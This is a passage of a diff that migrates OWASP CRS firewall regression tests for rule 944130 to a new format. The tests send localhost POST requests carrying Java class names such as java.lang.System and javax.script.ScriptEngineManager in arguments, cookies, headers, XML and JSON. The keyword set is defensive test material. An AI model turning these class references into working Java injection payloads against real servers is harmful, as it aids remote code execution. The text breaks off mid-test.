Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log: + expect_ids: [944130] + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" 
+ Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log: + expect_ids: [944130] + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log: + expect_ids: [944130] + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
